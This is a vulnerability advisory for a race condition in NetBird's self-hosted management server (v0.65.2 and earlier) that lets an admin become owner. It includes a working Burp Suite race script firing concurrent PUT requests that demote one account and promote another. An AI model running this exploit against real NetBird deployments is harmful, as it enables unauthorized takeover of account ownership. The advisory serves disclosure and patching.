PT-2026-32138 · Go · Github.Com/Netbirdio/Netbird
Publicado
2026-04-01
·
Atualizado
2026-04-01
CVSS v3.1
4.4
Média
| Vetor | AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:N |
Summary
A race condition vulnerability allows authenticated admin-privileged users to escalate to owner privilege.
Details
The vulnerability exists in the
updateUser function, which is connected to the /users/{userId} PUT request. This function then calls the SaveOrAddUsers function, which checks the user's permissions on two separate occasions. The first check verifies whether the initiator is an admin or owner and rejects the request if the initiator is not. The second check retrieves the user role details from the database again and saves them in a variable called initiatorUser.SaveOrAddUsers Function
Location:
netbird/management/server/user.go — Line 556Afterwards, the
validateUserUpdate function is called, which checks if the initiator has permission to update that specific user's role. This validation is lacking, as it assumes the initiator is an admin or owner. In the case that the initiator is a regular user, these conditions do not apply, and the target can be updated to owner even when the initiator holds only a user role.validateUserUpdate Function
Location:
netbird/management/server/user.go — Line 862In summary, if the initiator's permission is admin at the first check and gets dropped to user at the second check, the initiator can update a user to owner.
Proof of Concept
It is possible to create the following attack:
The initiator (
old admin) creates two different accounts — one with a user role and another with an admin role. These will be referred to as new user and new admin from here on.Two different requests are needed:
- Request 1 — Using
new admin's JWT, a request is created that changesold admin's role to user. - Request 2 — Using
old admin's JWT, a request is created that changesnew user's role to owner.
Both requests need valid user IDs and
auto groups group IDs. They should be sent simultaneously without waiting for prior requests to return.There is a very small time gap between the first and second permission checks, so multiple tries and multiple copies of the requests may be needed. During a penetration test engagement, privilege escalation was achieved by using 5 copies of Request 1 and 100 copies of Request 2 without waiting for any request to complete. The request that updated the role to owner returned 500 status codes instead of 403, which when retried returned 200 and successfully applied the update.
The following Burp Suite race condition script was used. Note that it may still require multiple tries, and the
old admin account role must be reset to admin after every failed attempt.python
import time
def queueRequests(target, wordlists):
engine = RequestEngine(
endpoint=target.endpoint,
concurrentConnections=100,
requestsPerConnection=100,
pipeline=False
)
# Request 1
req1 = """PUT /api/users/{OLD ADMIN USERID} HTTP/2
Host: CHANGE WITH HOST
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer {NEW ADMIN TOKEN}
Content-Length: 73
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
{"role":"user","auto groups":[GROUP ID],"is blocked":false}"""
# Request 2
req2 = """PUT /api/users/{NEW USER USERID} HTTP/2
Host: CHANGE WITH HOST
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer {OLD ADMIN TOKEN}
Content-Length: 52
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
{"role":"owner","auto groups":[],"is blocked":false}"""
# Send first request
engine.queue(req1)
engine.queue(req1)
engine.queue(req1)
engine.queue(req1)
engine.queue(req1)
# Send second request
for i in range(100):
engine.queue(req2)
def handleResponse(req, interesting):
table.add(req)Impact
An attacker with an admin account on the self-hosted NetBird management application v0.65.2 or lower can escalate to owner privileges.
Correção
Race Condition
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Github.Com/Netbirdio/Netbird